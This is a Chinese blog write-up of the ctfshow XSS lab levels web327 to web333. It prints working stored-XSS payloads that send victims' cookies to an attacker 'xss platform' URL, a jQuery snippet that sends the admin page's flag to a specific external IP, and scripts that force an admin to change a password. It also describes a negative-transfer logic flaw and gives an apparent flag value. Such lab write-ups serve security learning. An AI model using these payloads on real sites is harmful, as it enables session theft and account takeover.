前言
欢迎来到我的博客
个人主页:北岭敲键盘的荒漠猫-CSDN博客
web327
打开页面是一个写信页面。
这里题目暗示不明显。
这里是要给admin写信,让他触发我们的xss。(不看解析不知道有个admin用户)
payload:
<svg οnlοad=window.location.href='http://xss平台地址/index.php?c='+document.cookie;>
接收cookie
web328
打开界面如下
思路如下
如果这里不是xss靶场的话,这里得考虑各种注入,xss,未授权,爆破,越权等一大堆漏洞。
但是这里是xss靶场
那么我们就考虑后台有个地方能看用户账号密码,所以我们注册一个带有xss的账号即可。
注册页面如下
用script即可,一命速通payload低配版没成功,高级版没尝试。
直接上payload:
<script>window.location.href='http://xss平台地址/blue/index.php?c='+document.cookie;</script>
密码看不着就不放密码上了,放到用户名上。
拿到cookie。
然后用他的cookie登录进去,看信息。
这里有个大坑。
你的payload会跳转地址,那么你点进去后台就会被你自己的payload给打掉。
解决思路:
换个安全性强的浏览器试试
换个不跳转的payload试试
把js放到服务器上,然后远程加载js(标签中加上src)
我给你payload就是了:ctfshow{cf9e1490-bbfe-4d91-8d2c-b36f6c25c0ed}
web329
打开界面是跟328一样的。
同样的思路来一遍了。
但是你用同样的方法会发现进去会提示你不是管理员。
原因就是凭据失效。
你需要在很短的时间内完成所有的事情。
所以你需要用js代码,当对方触发时要让他把页面内容发过来。
这串代码是对方页面中寻找有关flag相关的消息发送到我们这里。
$('.laytable-cell-1-0-1').each(function(index,value){ //获取标签下的值(flag)
if (value.innerHTML.indexOf('ctf'+'show'+'{')>-1){ //读取带有ctf、show、{ 的关键字
window.location.href='http://182.92.86.16:9004/blue/index.php?c='+value.innerHTML; //发送到自己的服务器
}
});
web330
这一关有点像xss配合csrf进行钓鱼的操作了。
这一关打开发现多了一个密码修改的界面
cookie失效,直接找flag被过滤。
修改密码的数据包是访问这个地址,而且还贼简单就一个参数。
那么我们的思路就可以让管理员触发xss访问这个地址然后触发密码更改。
我们登录进去看flag。
注册的时候用这个payload
window.location.href='http://127.0.0.1/api/change.php?p=123';
让他访问自己的这个地址改密码为123
然后咱直接进去就行了。
web331
界面跟上面的都是一样的。
看看这个数据包是什么样子。
跟上一个差不多,不过这个变成了post请求。
那么创建的账号这样搞就好。
$.ajax ({url:'http://127.0.0.1/api/change.php',type:'post',data:{p:'123'}});
web332
这关多了不少东西。
多了一个money系统。
修改密码依旧是post
但是好像给过滤了,无法改密码。
看看金额。
每次注册给5元。
弱智的方法
批量注册,批量发送转账数据包到一个账户中。
但是这个肯定咱不想干,太麻烦。
然后测试发现可以给自己汇款,而且金额是增加的。
稍微聪明点方法
这里又出现玩法了,类似于爆破疯狂给自己汇款即可。
但是咱是个懒虫,还是不想干。
最聪明的方法
金额可以汇款负数,那么咱们就是纯增加了。
现在有钱人我们直接买就行了。
web333
最后一关打完下班
当然这关还可以自己给自己转账。爆破即可
直接爆
有钱人,买了
本站资源均来自互联网,仅供研究学习,禁止违法使用和商用,产生法律纠纷本站概不负责!如果侵犯了您的权益请与我们联系!
转载请注明出处: 免费源码网-免费的源码资源网站 » ctfshow--xss靶场web327-web333(一命速通不了的靶场)
发表评论 取消回复